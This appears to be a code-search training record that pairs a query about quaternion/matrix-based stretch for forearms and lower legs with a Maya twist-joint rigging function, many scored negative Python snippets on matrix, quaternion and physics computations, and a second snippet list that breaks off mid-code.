matrix[i][j-1]+ ins_del\r\n \r\n if self.s1[i-1] == self.s2[j-1]:\r\n diag = matrix[i-1][j-1] + match\r\n else:\r\n diag = matrix[i-1][j-1] + mismatch\r\n \r\n return max(up, left, diag)\r\n \r\n for i in range(1,len(self.s1)+1):\r\n for j in range(1,len(self.s2)+1):\r\n matrix[i][j] =score_cell(i,j)\r\n \r\n return matrix", "def _two_body(edge_matrix_indices: numpy.ndarray, p: int, q: int, r: int,\n s: int) -> QubitOperator:\n # Initialize qubit operator.\n qubit_operator = QubitOperator()\n\n # Handle case of four unique indices.\n if len(set([p, q, r, s])) == 4:\n B_p = edge_operator_b(edge_matrix_indices, p)\n B_q = edge_operator_b(edge_matrix_indices, q)\n B_r = edge_operator_b(edge_matrix_indices, r)\n B_s = edge_operator_b(edge_matrix_indices, s)\n A_pq = edge_operator_aij(edge_matrix_indices, p, q)\n A_rs = edge_operator_aij(edge_matrix_indices, r, s)\n qubit_operator += 1 / 8. * A_pq * A_rs * (-QubitOperator(\n ()) - B_p * B_q + B_p * B_r + B_p * B_s + B_q * B_r + B_q * B_s -\n B_r * B_s +\n B_p * B_q * B_r * B_s)\n return qubit_operator\n\n # Handle case of three unique indices.\n elif len(set([p, q, r, s])) == 3:\n # Identify equal tensor factors.\n if p == r:\n B_p = edge_operator_b(edge_matrix_indices, p)\n B_q = edge_operator_b(edge_matrix_indices, q)\n B_s = edge_operator_b(edge_matrix_indices, s)\n A_qs = edge_operator_aij(edge_matrix_indices, q, s)\n qubit_operator += 1j * (A_qs * B_s + B_q * A_qs) * (QubitOperator(\n ()) - B_p) / 4.\n\n elif p == s:\n B_p = edge_operator_b(edge_matrix_indices, p)\n B_q = edge_operator_b(edge_matrix_indices, q)\n B_r = edge_operator_b(edge_matrix_indices, r)\n A_qr = edge_operator_aij(edge_matrix_indices, q, r)\n qubit_operator += -1j * (A_qr * B_r + B_q * A_qr) * (QubitOperator(\n ()) - B_p) / 4.\n\n elif q == r:\n B_p = edge_operator_b(edge_matrix_indices, p)\n B_q = edge_operator_b(edge_matrix_indices, q)\n B_s = edge_operator_b(edge_matrix_indices, s)\n A_ps = edge_operator_aij(edge_matrix_indices, p, s)\n qubit_operator += -1j * (A_ps * B_s + B_p * A_ps) * (QubitOperator(\n ()) - B_q) / 4.\n\n elif q == s:\n B_p = edge_operator_b(edge_matrix_indices, p)\n B_q = edge_operator_b(edge_matrix_indices, q)\n B_r = edge_operator_b(edge_matrix_indices, r)\n A_pr = edge_operator_aij(edge_matrix_indices, p, r)\n qubit_operator += 1j * (A_pr * B_r + B_p * A_pr) * (QubitOperator(\n ()) - B_q) / 4.\n\n # Handle case of two unique indices.\n elif len(set([p, q, r, s])) == 2:\n # Get coefficient.\n if p == s:\n B_p = edge_operator_b(edge_matrix_indices, p)\n B_q = edge_operator_b(edge_matrix_indices, q)\n qubit_operator += (QubitOperator(()) - B_p) * (QubitOperator(\n ()) - B_q) / 4.\n\n else:\n B_p = edge_operator_b(edge_matrix_indices, p)\n B_q = edge_operator_b(edge_matrix_indices, q)\n qubit_operator += -(QubitOperator(()) - B_p) * (QubitOperator(\n ()) - B_q) / 4.\n\n return qubit_operator", "def __mul__(self, quat2):\n p4=quat2.w\n p = quat2.imaginary\n p_cross = skew_symmetric(p)\n A=np.zeros((4,4))\n A[:3,:3]=p4*np.eye(3)+p_cross\n A[3,0:3] = -p.T\n A[:3,3] = p\n A[3,3] = p4\n quat_as_vector = dot(A,self.asColVector(\"xyzw\"))\n return Quat(quat_as_vector)", "def square(i, j):\n return map(sq_start, [i, j, i + 1, j + 1])", "def learned_RHS(t,y,q,x,desc):\n \n \n Ux_mat = create_Ux_mat(x)\n Uxx_mat = create_Uxx_mat(x)\n\n return (q[desc.index('u_{x}')]*Ux_mat.dot(y) + \n q[desc.index('u_{xx}')]*Uxx_mat.dot(y) +\n q[desc.index('u^2')]*y**2 +\n q[desc.index('u')]*y + \n q[desc.index('u^2u_{x}')]*(y**2)*Ux_mat.dot(y) + \n q[desc.index('uu_{x}')]*y*Ux_mat.dot(y) + \n q[desc.index('u^2u_{xx}')]*(y**2)*Uxx_mat.dot(y) + \n q[desc.index('uu_{xx}')]*y*Uxx_mat.dot(y) + \n q[desc.index('u_{x}^2')]*Ux_mat.dot(y)**2)", "def upper(mat):\n idx = np.triu_indices_from(mat, k=1)\n return mat[idx]", "def _holt__(x, xi, p, y, l, b, s, m, n, max_seen):\n alpha, beta, phi, alphac, betac, y_alpha = _holt_init(x, xi, p, y, l, b)\n for i in range(1, n):\n l[i] = (y_alpha[i - 1]) + (alphac * (l[i - 1]))\n return sqeuclidean(l, y)", "def inv(self, Am):\r\n # Section 1: MAmke sure Am cAmn be inverted.\r\n self.check_squareness(Am)\r\n self.check_non_singular(Am)\r\n \r\n # Section 2: MAmke copies of Am & I, AmM & IM, to use for row ops\r\n n = len(Am)\r\n AmM = self.copy_matrix(Am)\r\n I = self.identity_matrix(n)\r\n IM = self.copy_matrix(I)\r\n \r\n # Section 3: Perform row operAmtions\r\n indices = list(range(n)) # to Amllow flexible row referencing ***\r\n for fd in range(n): # fd stAmnds for focus diAmgonAml\r\n fdScAmler = 1.0 / AmM[fd][fd]\r\n # FIRST: scAmle fd row with fd inverse. \r\n for j in range(n): # Use j to indicAmte column looping.\r\n AmM[fd][j] *= fdScAmler\r\n IM[fd][j] *= fdScAmler\r\n # SECOND: operAmte on Amll rows except fd row Ams follows:\r\n for i in indices[0:fd] + indices[fd+1:]: \r\n # *** skip row with fd in it.\r\n crScAmler = AmM[i][fd] # cr stAmnds for \"current row\".\r\n for j in range(n): \r\n # cr - crScAmler * fdRow, but one element Amt Am time.\r\n AmM[i][j] = AmM[i][j] - crScAmler * AmM[fd][j]\r\n IM[i][j] = IM[i][j] - crScAmler * IM[fd][j]\r\n \r\n return IM", "def sqrty():\n return Operator([[(1.+1.j)/2,(-1-1.j)/2],[(1.+1.j)/2,(1.+1.j)/2]])", "def test_get_Q_alt(self):\n vect_length = 50\n x_vect = np.random.normal(size=vect_length) \\\n + 1.j * np.random.normal(size=vect_length)\n y_vect = np.random.normal(size=vect_length) \\\n + 1.j * np.random.normal(size=vect_length)\n\n self.ds.spw_Nfreqs = vect_length\n\n for i in range(vect_length):\n Q_matrix = self.ds.get_Q_alt(i)\n # Test that if the number of delay bins hasn't been set\n # the code defaults to putting that equal to Nfreqs\n self.assertEqual(self.ds.spw_Ndlys, self.ds.spw_Nfreqs)\n\n xQy = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, y_vect))\n yQx = np.dot(np.conjugate(y_vect), np.dot(Q_matrix, x_vect))\n xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))\n\n # Test that Q matrix has the right shape\n self.assertEqual(Q_matrix.shape, (vect_length, vect_length))\n\n # Test that x^t Q y == conj(y^t Q x)\n self.assertAlmostEqual(xQy, np.conjugate(yQx))\n\n # x^t Q x should be real\n self.assertAlmostEqual(np.imag(xQx), 0.)\n\n x_vect = np.ones(vect_length)\n Q_matrix = self.ds.get_Q_alt(vect_length//2)\n xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))\n self.assertAlmostEqual(xQx, np.abs(vect_length**2.))\n # Sending in sinusoids for x and y should give delta functions\n\n # Now do all the same tests from above but for a different number\n # of delay channels\n self.ds.set_Ndlys(vect_length-3)\n for i in range(vect_length-3):\n Q_matrix = self.ds.get_Q_alt(i)\n xQy = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, y_vect))\n yQx = np.dot(np.conjugate(y_vect), np.dot(Q_matrix, x_vect))\n xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))\n\n # Test that Q matrix has the right shape\n self.assertEqual(Q_matrix.shape, (vect_length, vect_length))\n\n # Test that x^t Q y == conj(y^t Q x)\n self.assertAlmostEqual(xQy, np.conjugate(yQx))\n\n # x^t Q x should be real\n self.assertAlmostEqual(np.imag(xQx), 0.)\n\n x_vect = np.ones(vect_length)\n Q_matrix = self.ds.get_Q_alt((vect_length-2)//2-1)\n xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))\n self.assertAlmostEqual(xQx, np.abs(vect_length**2.))\n # Sending in sinusoids for x and y should give delta functions\n\n # Make sure that error is raised when asking for a delay mode outside\n # of the range of delay bins\n pytest.raises(IndexError, self.ds.get_Q_alt, vect_length-1)\n\n # Ensure that in the special case where the number of channels equals\n # the number of delay bins, the FFT method gives the same answer as\n # the explicit construction method\n multiplicative_tolerance = 0.001\n self.ds.set_Ndlys(vect_length)\n for alpha in range(vect_length):\n Q_matrix_fft = self.ds.get_Q_alt(alpha)\n Q_matrix = self.ds.get_Q_alt(alpha, allow_fft=False)\n Q_diff_norm = np.linalg.norm(Q_matrix - Q_matrix_fft)\n self.assertLessEqual(Q_diff_norm, multiplicative_tolerance)\n\n # Check for error handling\n pytest.raises(ValueError, self.ds.set_Ndlys, vect_length+100)", "def refLinearizeSquared(image, detector):\n ampInfoCat = detector.getAmpInfoCatalog()\n for ampInfo in ampInfoCat:\n bbox = ampInfo.getBBox()\n sqCoeff = ampInfo.getLinearityCoeffs()[0]\n viewArr = image.Factory(image, bbox).getArray()\n viewArr[:] = viewArr + sqCoeff*viewArr**2", "def quad_eq_of_motion2(self,state,time,force,moment):\n\n\t\t\tA = np.matrix([ [0.25,0, -0.5/self.arm_length],\n\t\t\t\t[0.25,0.5/self.arm_length,0.],\n\t\t\t\t[0.25,0,0.5/self.arm_length],\n\t\t\t\t[0.25,-0.5/self.arm_length,0]])\n\t\t\tT=A*np.asmatrix(np.hstack((force,moment[:2]))).transpose()\n\t\t\tT_clamped=np.maximum(np.minimum(T,self.max_force/4.0),self.min_force/4.0)\n\t\t\tB = np.matrix([[1.0,1.0,1.0,1.0],\n\t\t\t\t\t\t\t[0.0,self.arm_length,0.0,-self.arm_length],\n\t\t\t\t\t\t\t[-self.arm_length,0.0,self.arm_length,0.]])\n\t\t\tforce = B[[0],:]*T_clamped;\n\t\t\tforce = np.array(force).reshape(-1,).tolist()\n\t\t\tmoment = np.vstack( (B[[1,2],:]*np.asmatrix(T_clamped), moment[2]));\n\t\t\tmoment = np.array(moment).reshape(-1,).tolist()\n\t\t\t\n\t\t\t#Assign 13 states\n\t\t\t#x = state[0]\n\t\t\t#y = state[1]\n\t\t\t#z = state[2]\n\t\t\txdot = state[3];\n\t\t\tydot = state[4];\n\t\t\tzdot = state[5];\n\t\t\tqW = state[6];\n\t\t\tqX = state[7];\n\t\t\tqY = state[8];\n\t\t\tqZ = state[9];\n\t\t\tp = state[10];\n\t\t\tq = state[11];\n\t\t\tr = state[12];\n\n\t\t\tquat = np.vstack((qW,qX,qY,qZ)); #!! Attention to the order!!\n\t\t\tbRw=self.quat2mat(quat.transpose())\n\t\t\tbRw=bRw.reshape(3,3) #to remove the last dimension i.e., 3,3,1\n\t\t\twRb = bRw.transpose()\n\t\t\t\n\t\t\t# Acceleration\n\t\t\taccel = 1.0 / self.mass * (wRb * np.matrix([[0],[0],force]) - np.matrix([[0],[0],[self.mass * self.gravity]]))\n\t\t\taccel = np.array(accel).reshape(-1,).tolist()\n\t\t\t# Angular velocity\n\t\t\tK_quat = 2.0; #%this enforces the magnitude 1 constraint for the quaternion\n\t\t\tquaterror = 1 - (qW**2 + qX**2 + qY**2 + qZ**2);\n\t\t\tqdot = -1/2*np.matrix([ [0,-p,-q,-r],[p,0,-r,q],[q,r,0,-p],[r,-q,p,0]])*quat + K_quat*quaterror * quat\n\t\t\tqdot = np.array(qdot).reshape(-1,).tolist()\n\t\t\t# % Angular acceleration\n\t\t\tomega = np.matrix([[p],[q],[r]])\n\t\t\ttemp = np.squeeze(np.cross(omega.transpose(),(self.Inertia*omega).transpose()))\n\t\t\tpqrdot = self.invInertia * (moment - temp).reshape(-1,1)\n\t\t\tsdot=np.zeros(13) #default=float64\n\t\t\tsdot[0]=xdot#[]\n\t\t\tsdot[1]=ydot\n\t\t\tsdot[2]=zdot\n\t\t\tsdot[3]=accel[0]\n\t\t\tsdot[4]=accel[1]\n\t\t\tsdot[5]=accel[2]\n\t\t\tsdot[6]=qdot[0]\n\t\t\tsdot[7]=qdot[1]\n\t\t\tsdot[8]=qdot[2]\n\t\t\tsdot[9]=qdot[3]\n\t\t\tsdot[10]=pqrdot[0]\n\t\t\tsdot[11]=pqrdot[1]\n\t\t\tsdot[12]=pqrdot[2]\n\t\t\treturn sdot", "def rayleigh(th,r,wl,a,n1,n2):\n k = 2*np.pi/wl\n n_2 = n2**2/n1**2\n return ((k**2)*(a**3)*((n_2-1)/(n_2+2))/r)*np.array([[np.cos(th), 0],[0,1]])", "def high_level(low_scores, query, template_length):\n h_mat = prog_dynam_matrix(list(range(template_length)), query)\n h_mat.create_content()\n h_mat.fill_high(low_scores)\n h_mat.show()\n h_mat.optimal_path()", "def h(surj):\n answer = s(surj)\n for r in range(1, arity - 1):\n answer += i(s(p(surj, r)), r)\n return answer", "def slerp(targettime, time, q):\n #debug_here()\n i_interp_int, t_matrix = compute_t(targettime, time)\n q_interp = mult(q[np.clip(i_interp_int + 1,0,len(time)-1),:], inv(q[i_interp_int,:]))\n q_interp = pow(q_interp, t_matrix) \n q_interp = mult(q_interp, q[i_interp_int,:])\n t_zero = (t_matrix == 0).flatten()\n q_interp[t_zero] = q[i_interp_int][t_zero]\n return q_interp", "def _makequads_all(self):\n nholes = self.ctrs.shape[0]\n qlist = []\n for i in range(nholes):\n for j in range(nholes):\n for k in range(nholes):\n for q in range(nholes):\n if i < j and j < k and k < q:\n qlist.append((i, j, k, q))\n qarray = np.array(qlist).astype(np.int)\n if self.verbose:\n print(\"qarray\", qarray.shape, \"\\n\", qarray)\n qname = []\n uvwlist = []\n # foreach row of 3 elts...\n for quad in qarray:\n qname.append(\"{0:d}_{1:d}_{2:d}_{3:d}\".format(\n quad[0], quad[1], quad[2], quad[3]))\n if self.verbose:\n print('quad:', quad, qname[-1])\n uvwlist.append((self.ctrs[quad[0]] - self.ctrs[quad[1]],\n self.ctrs[quad[1]] - self.ctrs[quad[2]],\n self.ctrs[quad[2]] - self.ctrs[quad[3]]))\n if self.verbose:\n print(qarray.shape, np.array(uvwlist).shape)\n return qarray, np.array(uvwlist)", "def bidimensional_map_lin(h, t, x, y, x_0, y_0):\n gamma = 3 * np.pi\n r = np.sqrt(np.square(x - x_0) + np.square(y - y_0))\n\n f = lambda r: gamma * r + (gamma / 2) * r**2 + np.sqrt(r)\n\n return h(t) * f(r)", "def triangulate(Kl, Kr, Twl, Twr, pl, pr, Sl, Sr):\r\n #--- FILL ME IN ---\r\n \r\n # Compute baseline (right camera translation minus left camera translation)\r\n Cr = (Twr)[0:3,-1] #left camera translaton\r\n Cl = (Twl)[0:3,-1] #right camera translation\r\n b = (Cr - Cl).reshape(3,1)\r\n \r\n \r\n # Unit vectors projecting from optical center to image plane points.\r\n # Use variables rayl and rayr for the rays.\r\n rayl = Twl[0:3,0:3].dot(inv(Kl)).dot(np.insert(pl,2,1, axis =0))\r\n rayl = rayl/norm(rayl) #convert to unit vector\r\n \r\n rayr = Twr[0:3,0:3].dot(inv(Kr)).dot(np.insert(pr,2,1, axis =0))\r\n rayr = rayr/norm(rayr) #convert to unit vector\r\n \r\n \r\n # Projected segment lengths.\r\n # Use variables ml and mr for the segment lengths.\r\n rLrR = rayl.T.dot(rayr)[0][0]\r\n ml = ((b.T.dot(rayl) - (b.T.dot(rayr))*(rLrR))/(1-rLrR**2))[0][0]\r\n mr = (rLrR*ml - b.T.dot(rayr))[0][0]\r\n \r\n # Segment endpoints.\r\n # User variables Pl and Pr for the segment endpoints.\r\n Pl = Cl.reshape(3,1) + rayl*ml\r\n Pr = Cr.reshape(3,1) + rayr*mr\r\n \r\n # Now fill in with appropriate ray Jacobians. These are \r\n # 3x4 matrices, but two columns are zeros (because the right\r\n # ray direction is not affected by the left image point and \r\n # vice versa).\r\n drayl = np.zeros((3, 4)) # Jacobian left ray w.r.t. image points.\r\n drayr = np.zeros((3, 4)) # Jacobian right ray w.r.t. image points.\r\n \r\n # Add code here...\r\n #rayl = f(x)_l/g(x)_l = r/norm(r). Equation for unit vector provided in the assignment\r\n #drayl = d/dx[f(x)_l/g(x)_l] = ( d/dx[f(x)_l]*g(x)_l - f(x)_l*d/dx[g(x)_l] / [g(x)_l]^2 )\r\n #where x is the image plane points in the left camera ul (i.e pl[0][0]), vl (i.e pl[1][0]), \r\n #and right camera ur (i.e pr[0][0]), vr (i.e pr[1][0])\r\n \r\n #As per equation in the assignment. I.e column vector (c1*u, c2*v, c3)\r\n fxl = Twl[:3,:3].dot(inv(Kl)).dot(np.array([[pl[0][0]],[pl[1][0]],[1]]))\r\n \r\n #f(x)_l = column vector(c1*ul, c2*vl + c3). \r\n #Therefore f(x)_l w.r.t u = f(x)l_u = column vector (c1, 0, 0,)\r\n fxl_u = Twl[:3,:3].dot(inv(Kl)).dot(np.array([[1],[0],[0]]))\r\n #Therefore f(x)_l w.r.t v = f(x)l_v = column vector (0, c2, 0,)\r\n fxl_v = Twl[:3,:3].dot(inv(Kl)).dot(np.array([[0],[1],[0]]))\r\n \r\n #Same math applied as with f(x)_l shown above - only that it is with the right camera\r\n fxr = Twr[:3,:3].dot(inv(Kr)).dot(np.array([[pr[0][0]],[pr[1][0]],[1]]))\r\n fxr_u = Twr[:3,:3].dot(inv(Kr)).dot(np.array([[1],[0],[0]]))\r\n fxr_v = Twr[:3,:3].dot(inv(Kr)).dot(np.array([[0],[1],[0]]))\r\n \r\n #Recall from above that g(x)_l = norm(r)\r\n gxl = norm(fxl)\r\n #g(x)_l wrt to u is; u*c1^2/norm(r). Where u*c1^2 = fxl_u.T.dot(fxl)\r\n # and gxl = norm(r)\r\n gxl_u = fxl_u.T.dot(fxl)/gxl \r\n #g(x)_l wrt to v is; v*c2^2/norm(r). Where v*c2^2 = fxl_v.T.dot(fxl)\r\n # and gxl = norm(r) \r\n gxl_v = fxl_v.T.dot(fxl)/gxl\r\n \r\n # same as above except with the right camera\r\n gxr = norm(fxr)\r\n gxr_u = fxr_u.T.dot(fxr)/gxr\r\n gxr_v = fxr_v.T.dot(fxr)/gxr\r\n \r\n #Fill in Jacobian results with results from above \r\n drayl[:,0] = ((fxl_u.dot(gxl) - fxl.dot(gxl_u))/(gxl*gxl)).reshape(3,)\r\n drayl[:,1] = ((fxl_v.dot(gxl) - fxl.dot(gxl_v))/(gxl*gxl)).reshape(3,) \r\n drayr[:,2] = ((fxr_u.dot(gxr) - fxr.dot(gxr_u))/(gxr*gxr)).reshape(3,)\r\n drayr[:,3] = ((fxr_v.dot(gxr) - fxr.dot(gxr_v))/(gxr*gxr)).reshape(3,)\r\n \r\n \r\n \r\n #------------------\r\n \r\n # Compute dml and dmr (partials wrt segment lengths).\r\n # Compute dml and dmr (partials wrt segment lengths).\r\n u = np.dot(b.T, rayl) - np.dot(b.T, rayr)*np.dot(rayl.T, rayr)\r\n v = 1 - np.dot(rayl.T, rayr)**2\r\n\r\n du = (b.T@drayl).reshape(1, 4) - \\\r\n (b.T@drayr).reshape(1, 4)*np.dot(rayl.T, rayr) - \\\r\n np.dot(b.T, rayr)*((rayr.T@drayl) + (rayl.T@drayr)).reshape(1, 4)\r\n \r\n dv = -2*np.dot(rayl.T, rayr)*((rayr.T@drayl).reshape(1, 4) + \\\r\n (rayl.T@drayr).reshape(1, 4))\r\n\r\n m = np.dot(b.T, rayr) - np.dot(b.T, rayl)@np.dot(rayl.T, rayr)\r\n n = np.dot(rayl.T, rayr)**2 - 1\r\n\r\n dm = (b.T@drayr).reshape(1, 4) - \\\r\n (b.T@drayl).reshape(1, 4)*np.dot(rayl.T, rayr) - \\\r\n np.dot(b.T, rayl)@((rayr.T@drayl) + (rayl.T@drayr)).reshape(1, 4)\r\n dn = -dv\r\n\r\n dml = (du*v - u*dv)/v**2\r\n dmr = (dm*n - m*dn)/n**2\r\n\r\n # Finally, compute Jacobian for P w.r.t. image points.\r\n JP = (ml*drayl + rayl*dml + mr*drayr + rayr*dmr)/2\r\n \r\n #--- FILL ME IN ---\r\n \r\n # 3D point.\r\n P = (Pl + Pr)/2\r\n \r\n # 3x3 landmark point covariance matrix (need to form\r\n # the 4x4 image plane covariance matrix first).\r\n M = np.zeros((4,4))\r\n M[0:2,0:2] = Sl\r\n M[2:4,2:4] = Sr\r\n \r\n S = JP.dot(M).dot(JP.T) #as per equation in the assignment\r\n\r\n # Check for correct outputs...\r\n correct = isinstance(Pl, np.ndarray) and Pl.shape == (3, 1) and \\\r\n isinstance(Pr, np.ndarray) and Pr.shape == (3, 1) and \\\r\n isinstance(P, np.ndarray) and P.shape == (3, 1) and \\\r\n isinstance(S, np.ndarray) and S.shape == (3, 3)\r\n\r\n if not correct:\r\n raise TypeError(\"Wrong type or size returned!\")\r\n\r\n return Pl, Pr, P, S", "def multiply_quaternions( qa, qb ):\n combined = Quaternion()\n\n combined.w = (qa.w * qb.w - qa.x * qb.x - qa.y * qb.y - qa.z * qb.z)\n combined.x = (qa.x * qb.w + qa.w * qb.x + qa.y * qb.z - qa.z * qb.y)\n combined.y = (qa.w * qb.y - qa.x * qb.z + qa.y * qb.w + qa.z * qb.x)\n combined.z = (qa.w * qb.z + qa.x * qb.y - qa.y * qb.x + qa.z * qb.w)\n return combined", "def get_quad_slip(q, rake):\n P0, P1, P2 = q[0:3]\n strike = P0.azimuth(P1)\n dip = get_quad_dip(q)\n s1_local = get_local_unit_slip_vector(strike, dip, rake)\n s0_local = Vector(0, 0, 0)\n qlats = [a.latitude for a in q]\n qlons = [a.longitude for a in q]\n proj = get_orthographic_projection(\n np.min(qlons), np.max(qlons), np.min(qlats), np.max(qlats))\n s1_ll = proj(np.array([s1_local.x]), np.array([s1_local.y]), reverse=True)\n s0_ll = proj(np.array([s0_local.x]), np.array([s0_local.y]), reverse=True)\n s1_ecef = Vector.fromTuple(latlon2ecef(s1_ll[1], s1_ll[0], s1_local.z))\n s0_ecef = Vector.fromTuple(latlon2ecef(s0_ll[1], s0_ll[0], s0_local.z))\n slp_ecef = (s1_ecef - s0_ecef).norm()\n return slp_ecef" ]
[ "0.5514963", "0.52410305", "0.5185732", "0.51259094", "0.5053267", "0.5020422", "0.49390778", "0.4879556", "0.48793352", "0.4878152", "0.4855", "0.4854443", "0.48542276", "0.48520848", "0.48423955", "0.4821107", "0.4791083", "0.47887972", "0.47870728", "0.47847036", "0.47841114", "0.4783863", "0.47800145", "0.47678885", "0.4763263", "0.4752754", "0.47518486", "0.47462255", "0.47438517", "0.47342122", "0.4731886", "0.4730406", "0.4723456", "0.4721337", "0.47117448", "0.47064033", "0.4703165", "0.4685504", "0.46784943", "0.46783403", "0.4671491", "0.4670942", "0.4670942", "0.466681", "0.4664014", "0.46639138", "0.46627274", "0.46618605", "0.4660712", "0.4649648", "0.4636134", "0.46339092", "0.46295887", "0.46283084", "0.46266022", "0.46260878", "0.46140805", "0.46119183", "0.46118927", "0.46086833", "0.46067476", "0.45964712", "0.4593806", "0.45896128", "0.45887083", "0.45872757", "0.45771107", "0.45752844", "0.45733035", "0.4572677", "0.45708475", "0.45685822", "0.45621425", "0.45614862", "0.456146", "0.45569515", "0.45563382", "0.4554371", "0.4545316", "0.4545016", "0.4541337", "0.45383808", "0.45346022", "0.4530449", "0.4527928", "0.45161694", "0.4515946", "0.4513951", "0.45084926", "0.45028844", "0.45012414", "0.45008156", "0.4500205", "0.44991726", "0.44974265", "0.4490736", "0.44900218", "0.44892347", "0.44858834", "0.44836938" ]
0.56926125
0
Quaterion / matrix based stretch for forearms and lower legs
def lower_twist(lo_arm_ik_jnt, wrist_ik_jnt, lo_arm_jnt, lo_arm_twist_jnts, wrist_jnt=None): # Create a group that does not rotate and parent under the ik arm parent (shoulder) stable_reader_grp = utils.create_node('transform', n=lo_arm_ik_jnt+'_stable_reader', p=lo_arm_ik_jnt) # Create a grp that will rotate with ik arm twist_reader_grp = utils.create_node('transform', n=lo_arm_ik_jnt+'_twist_reader', p=lo_arm_ik_jnt) mc.addAttr(twist_reader_grp, ln='twist', k=1) mc.delete(mc.pointConstraint(wrist_ik_jnt, twist_reader_grp)) mc.parent(twist_reader_grp, wrist_ik_jnt) # Now set up mult matrix and decomp nodes to extract the twist between the two nodes mult_mtx = mc.createNode('multMatrix') decomp_mtx = mc.createNode('decomposeMatrix') quat_to_euler = mc.createNode('quatToEuler') mc.connectAttr(stable_reader_grp+'.worldInverseMatrix', mult_mtx+'.matrixIn[1]') mc.connectAttr(twist_reader_grp+'.worldMatrix', mult_mtx+'.matrixIn[0]') mc.connectAttr(mult_mtx+'.matrixSum', decomp_mtx+'.inputMatrix') mc.connectAttr(decomp_mtx+'.outputQuatX', quat_to_euler+'.inputQuatX') mc.connectAttr(decomp_mtx+'.outputQuatW', quat_to_euler+'.inputQuatW') utils.connect_negative(quat_to_euler+'.outputRotateX', twist_reader_grp+'.twist') # Connect joints mc.parentConstraint(lo_arm_ik_jnt, lo_arm_jnt, mo=1) if wrist_jnt: mc.parentConstraint(wrist_ik_jnt, wrist_jnt, mo=1) div = 1.0 / (len(lo_arm_twist_jnts)) mdl = mc.createNode('multDoubleLinear') mc.setAttr(mdl+'.input1', div) mc.connectAttr(quat_to_euler+'.outputRotateX', mdl+'.input2') for i, joint in enumerate(lo_arm_twist_jnts): mc.connectAttr(mdl+'.output', joint+'.rx')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ar_addStretchSquash():\n setupName = 'Nose'\n sel = cmds.ls(sl=True)\n chain = cmds.ls(sel[0], dag=True, typ='joint')\n IKSpine = cmds.ikHandle(sj=chain[0], ee=chain[len(chain) - 1], sol='ikSplineSolver')\n # rename\n cmds.rename(IKSpine[0], 'IKSplineHandle_' + setupName)\n cmds.rename(IKSpine[1], 'IKSplineEff_' + setupName)\n cmds.rename(IKSpine[2], 'IKSplineCurve_' + setupName)\n # create new joints.\n cmds.select(cl=True)\n bindStartJt = cmds.joint(n='JtCrvBind01')\n cmds.select(cl=True)\n bindEndJt = cmds.joint(n='JtCrvBind02')\n cmds.delete(cmds.parentConstraint(chain[0], bindStartJt))\n cmds.delete(cmds.parentConstraint(chain[len(chain) - 1], bindEndJt))\n\n cmds.skinCluster(bindStartJt, bindEndJt, 'IKSplineCurve_' + setupName, bm=0, sm=0, nw=1, wd=0, mi=2)\n ctlStart = cmds.circle(nr=[1, 0, 0], n='Toony' + setupName + '01_CTRL', ch=False)\n extraGrp = cmds.createNode('transform', n='Toony' + setupName + '01ExtraGrp')\n offGrp = cmds.createNode('transform', n='Toony' + setupName + '01OffsetGrp')\n cmds.parent(ctlStart[0], extraGrp)\n cmds.parent(extraGrp, offGrp)\n cmds.delete(cmds.parentConstraint(bindStartJt, offGrp))\n # endJOint\n ctlEnd = cmds.circle(nr=[1, 0, 0], n='Toony' + setupName + '02_CTRL', ch=False)\n extraGrpEnd = cmds.createNode('transform', n='Toony' + setupName + '02ExtraGrp')\n offGrpEnd = cmds.createNode('transform', n='Toony' + setupName + '02OffsetGrp')\n cmds.parent(ctlEnd[0], extraGrpEnd)\n cmds.parent(extraGrpEnd, offGrpEnd)\n cmds.delete(cmds.parentConstraint(bindEndJt, offGrpEnd))\n # parent constraint wiht bind joints.\n cmds.parentConstraint(ctlStart[0], bindStartJt)\n cmds.parentConstraint(ctlEnd[0], bindEndJt)\n # Create connection with node basis.\n crvInfo = cmds.createNode('curveInfo', n='curveInfo_Toony' + setupName)\n shpCrv = cmds.listRelatives('IKSplineCurve_' + setupName, s=True)\n cmds.connectAttr(shpCrv[0] + '.worldSpace[0]', crvInfo + '.inputCurve', f=True)\n mdnForSX = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_ScaleX')\n mdnForPW = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_Power')\n mdnForYZ = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_ScaleYZ')\n cmds.setAttr(mdnForSX + '.operation', 2)\n cmds.setAttr(mdnForPW + '.operation', 3)\n cmds.setAttr(mdnForYZ + '.operation', 2)\n # connections.\n cmds.connectAttr(crvInfo + '.arcLength', mdnForSX + '.input1X', f=True)\n cmds.setAttr(mdnForSX + '.input2X', cmds.getAttr(mdnForSX + '.input1X'))\n scaledJoint = chain[:-1]\n for each in scaledJoint:\n cmds.connectAttr(mdnForSX + '.outputX', each + '.sx', f=True)\n # power connections.\n cmds.connectAttr(mdnForSX + '.outputX', mdnForPW + '.input1X', f=True)\n cmds.setAttr(mdnForPW + '.input2X', 0.5)\n cmds.connectAttr(mdnForPW + '.outputX', mdnForYZ + '.input2X', f=True)\n cmds.setAttr(mdnForYZ + '.input1X', 1)\n for each in scaledJoint:\n cmds.connectAttr(mdnForYZ + '.outputX', each + '.sy')\n cmds.connectAttr(mdnForYZ + '.outputX', each + '.sz')\n # TODO: need to full proof this function.", "def glueEmH( Ja, Jf, truncNum = scipy.inf ):\n w, v = truncBasisH( Ja, truncNum )\n sPlus, sMinus, sZ = sPlusAndMinusAndZ( v )\n \n H1 = scipy.zeros( ( len(w)**4, len(w)**4 ) )\n \n for n in range( len(w)**4 ):\n # Diagonal previous generation contributions\n o = oct(n)[-4:].zfill(4)\n o = [int(char) for char in o]\n o_A, o_B, o_C, o_D = o\n \n H1[n, n] += scipy.sum( [ w[ i ] for i in o ] )\n \n # Edge terms\n for np in range( n, len(w)**4 ):\n op = oct(np)[-4:].zfill(4)\n op = [int(char) for char in op]\n op_A, op_B, op_C, op_D = op\n \n x = 0.\n if ( (o_B == op_B) and (o_C == op_C) ):\n x += -Jf * ( .5 * ( sPlus[0][o_A, op_A] * sMinus[0][o_D, 